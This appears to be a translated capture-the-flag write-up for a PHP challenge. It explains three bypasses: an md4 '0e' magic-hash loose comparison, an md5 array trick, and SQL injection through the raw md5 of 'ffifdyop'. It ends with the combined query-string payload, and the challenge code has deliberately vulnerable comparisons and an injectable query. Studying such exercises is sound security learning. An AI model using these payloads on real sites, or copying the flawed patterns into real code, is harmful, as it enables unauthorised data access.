<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
die('level 1 failed');
}
//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
die('level 2 failed');
}
//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
?>
Three bypasses: one is to bypass md4, the other is to bypass md5, and the third is to bypass sql injection.
1.md4 bypass
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
die('level 1 failed');
}
If \$_GET["hash1"] != hash("md4", \$_GET["hash1"])
, exit the script, which means that \$_GET["hash1"]
you have ==hash("md4",$_GET["hash1"])
to bypass the first level.
Here spent a long, long time, the team were not around in the past thought, until his teammates found an article: https://medium.com/@Asm0d3us/part-1-php-tricks-in-web-ctf-challenges-e1981475b3e4
only I think that it can be bypassed by the scientific calculation method, that is to say, to find a plaintext that starts with a scientific calculation method 0e, and then its encryption is also 0e followed by numbers. This is the comparison in the form of scientific notation. Because it is a weak type comparison, it can be bypassed;
plaintext and ciphertext that meet the conditions:
plaintext : 0e001233333333333334557778889
md4 hash : 0e434041524824285414215559233446
?hash1=0e001233333333333334557778889
This bypasses leve 1.
2.md5 is relatively bypassed
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
die('level 2 failed');
}
md5 strong type comparison, here can be bypassed by passing the array directly
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2
3.SQL injection md5 bypass
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
The password is encrypted by md5 and then directly spliced, and ffifdyop
after md5($password,true), the result happens to be'or'6 ] !r, b.
Splicing execution sql statement:
$query="SELECT * FROM flag WHERE password = ' ' or '<xxx>'";
https://blog.csdn.net/sinat_41380394/article/details/81490193
The final payload is as follows:
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop